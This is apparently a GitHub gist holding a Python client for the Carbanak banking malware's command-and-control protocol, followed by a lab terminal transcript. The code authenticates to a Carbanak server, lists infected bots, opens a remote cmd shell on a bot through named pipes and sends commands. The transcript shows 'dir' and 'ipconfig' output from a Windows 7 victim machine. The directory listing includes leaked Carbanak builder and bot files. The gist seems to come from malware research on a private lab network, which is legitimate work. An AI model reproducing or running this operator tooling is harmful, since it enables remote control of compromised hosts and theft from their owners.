Skip to content

Instantly share code, notes, and snippets.

@stvemillertime
Forked from ecks/server.py
Created November 4, 2022 13:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save stvemillertime/d9c98f044a38ab4cb96e6fcd762d4778 to your computer and use it in GitHub Desktop.
Save stvemillertime/d9c98f044a38ab4cb96e6fcd762d4778 to your computer and use it in GitHub Desktop.
Carbanak Server
import socket
import hashlib
import struct
import time
class IdUid:
def __init__(self):
id = None
uid = None
info = None
ip = None
comment = None
ports = None
idGroups = None
class StreamPipeInfo:
def __init__(self):
id = None
namePipe = None
class Server:
def __init__(self):
self.CmdGetIds = 1
self.CmdSendCmd = 2
self.CmdJoinStream = 5
self.CmdGetPipeStreams = 11
self.CmdPutPipeData = 12
self.HOST = '192.168.12.137'
self.PORT = 800
self.PSWD_HASH = hashlib.md5("password".encode('utf-8')).digest()
self.s = self.Get_Connect()
def putBytes(self, data, index, size):
self.s.sendall(data)
def getInt(self):
return struct.unpack('i', self.s.recv(4))[0]
def putInt(self, data):
self.s.sendall(struct.pack('i', data))
def getShort(self):
return struct.unpack('h', self.s.recv(2))[0]
def putShort(self, data):
self.s.sendall(struct.pack('h', data))
def getString(self):
len = self.getShort()
byte_string = struct.unpack(str(len)+'s', self.s.recv(len))[0]
return byte_string.decode("1251")
def putString(self, data):
self.putShort(len(data))
self.s.sendall(bytearray(data, "1251"))
# called from init
def Get_Connect(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.HOST, self.PORT))
s.sendall(self.PSWD_HASH)
return s
def GetConnect(self, id, cmd):
data = struct.pack('ii', id, cmd)
self.s.sendall(data)
def CM_GetIds(self):
ret = []
self.GetConnect(0, self.CmdGetIds)
count = self.getInt()
print('count', count)
if count > 0:
iu = IdUid()
id = self.getInt()
print('id', id)
iu.id = id
uid = self.getString()
print('uid', uid)
iu.uid = uid
info = self.getString()
print('info', info)
iu.info = info
ip = self.getString()
print('ip', ip)
iu.ip = ip
comment = self.getString()
print('comment', comment)
iu.comment = comment
ports = self.getString()
print('ports', ports)
iu.ports = ports
idGroups = self.getInt()
print('idGroups', idGroups)
iu.idGroups = idGroups
ret.append(iu)
return ret
def CM_SendCmd(self, id, uid, cmd):
self.GetConnect(id, self.CmdSendCmd)
self.putString(cmd)
def CM_GetStream(self, id, uid, idStream):
self.GetConnect(id, self.CmdJoinStream)
self.putInt(idStream)
return self.s
def CM_GetPipeStreams(self, id, uid, nameId):
self.GetConnect(id, self.CmdGetPipeStreams)
self.putString(nameId)
count = self.getShort()
ret = [None] * count
for i in range(count):
idStream = self.getInt()
namePipe = self.getString()
print(repr(idStream))
print(repr(namePipe))
ret[i] = StreamPipeInfo()
ret[i].id = idStream;
ret[i].namePipe = namePipe;
return ret
def CM_PutPipeData(self, id, uid, namePipe, data, count):
self.GetConnect(id, self.CmdPutPipeData)
self.putString(namePipe)
self.putInt(count)
self.putBytes(data, 0, count)
return True
def StarterCmd(ids):
Server().CM_SendCmd(ids[0].id, ids[0].uid, "cmd")
# wait a bit for pipe to become available
time.sleep(10)
pipes = Server().CM_GetPipeStreams(ids[0].id, ids[0].uid, "cmd")
jS = Server().CM_GetStream(ids[0].id, ids[0].uid, pipes[0].id) # joined Stream Socket
return pipes, jS
def SendInput(user_cmd, id, uid, pipeId, namePipe):
user_cmd = user_cmd+"\r\n"
sz_data = len(user_cmd)
# cmd (UInt32), answer (byte * 32), func (UInt32), tag (UInt32), sz_data (Int32)
msg_pack = struct.Struct("I32sIIi")
msg = msg_pack.pack(1, bytearray('\x00' * 32, 'utf-8'), 0, 0, sz_data)
user_data = bytearray(user_cmd, "866") # old school USSR 866 encoding
sz = 2 + msg_pack.size + sz_data + 4 + 4 + 2
data = bytearray(sz)
i = 0
struct.pack_into("i", data, i, msg_pack.size)
i += 1
struct.pack_into("i", data, i, sz_data)
i += 1
data[i:i+msg_pack.size] = msg
i += msg_pack.size
data[i:i+sz_data] = user_data
i += sz_data
struct.pack_into("I", data, i, 55)
i += 4
struct.pack_into("I", data, i, pipeId)
i += 4
struct.pack_into("H", data, i, 0)
i += 2
Server().CM_PutPipeData(id, uid, namePipe, data, sz)
# read from joined socket
def CmdOutputer(jS):
time.sleep(10)
# read output from socket
out = jS.recv(2048)
out = out.decode("866")
print(out)
ids = Server().CM_GetIds()
pipes, jS = StarterCmd(ids)
SendInput("dir", ids[0].id, ids[0].uid, pipes[0].id, pipes[0].namePipe)
CmdOutputer(jS)
time.sleep(10)
SendInput("ipconfig", ids[0].id, ids[0].uid, pipes[0].id, pipes[0].namePipe)
CmdOutputer(jS)
root@kali:~/carbanak_rpc# python3 server.py
count 1
id 1
uid example0c3d2682004a49022
info OS: Win7SP1.x64, Domain: WIN-GS0JF9KMEJ2, User: ecks, Ver: 1.3
ip 192.168.12.136
comment
ports
idGroups 0
1
'GCZScvcfzUbGNcYDj'
║ Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>C═ dir
Volume in drive C has no label.
Volume Serial Number is 4CBF-78E0
Directory of C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????
08/15/2019 07:18 AM <DIR> .
08/15/2019 07:18 AM <DIR> ..
07/22/2019 10:01 PM 147,456 bot.dll
07/22/2019 10:01 PM 150,528 bot.exe
07/22/2019 10:01 PM 100,352 botcmd.exe
07/22/2019 10:01 PM 6,773 bot_cmd.txt
08/15/2019 07:18 AM 150,528 bot_out.exe
07/22/2019 10:01 PM 155,136 bot_x64.dll
07/22/2019 10:01 PM 155,136 bot_x64.exe
07/22/2019 10:01 PM 88,576 builder.exe
07/22/2019 10:01 PM 6 builder_gui.config
07/22/2019 10:01 PM 3,507,712 builder_gui.exe
07/22/2019 10:01 PM 142,336 CmdManager.exe
07/22/2019 10:01 PM 98 CmdManager.xml
07/22/2019 10:01 PM 184 config_server.xml
08/15/2019 07:17 AM 1,076 example.config
07/22/2019 10:01 PM 74,752 Player.dll
07/22/2019 10:01 PM 6,656 PlayerExe.exe
08/15/2019 07:18 AM 308 private.key
08/15/2019 07:18 AM 84 public.key
08/15/2019 07:18 AM 348 public_key.txt
07/22/2019 10:01 PM 153,600 Server.exe
07/22/2019 10:01 PM 147,968 VncSharp.dll
07/22/2019 10:01 PM <DIR> _plugins
21 File(s) 4,989,613 bytes
3 Dir(s) 37,535,412,224 bytes free
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>
ipconfig
Г╚
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
Link-local IPv6 Address . . . . . : fe80::f506:2f75:c598:7843%11
IPv4 Address. . . . . . . . . . . : 192.168.12.136
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Tunnel adapter isatap.{9B02B57E-595C-4236-9E7C-08CE5E649765}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter isatap.localdomain:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : localdomain
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment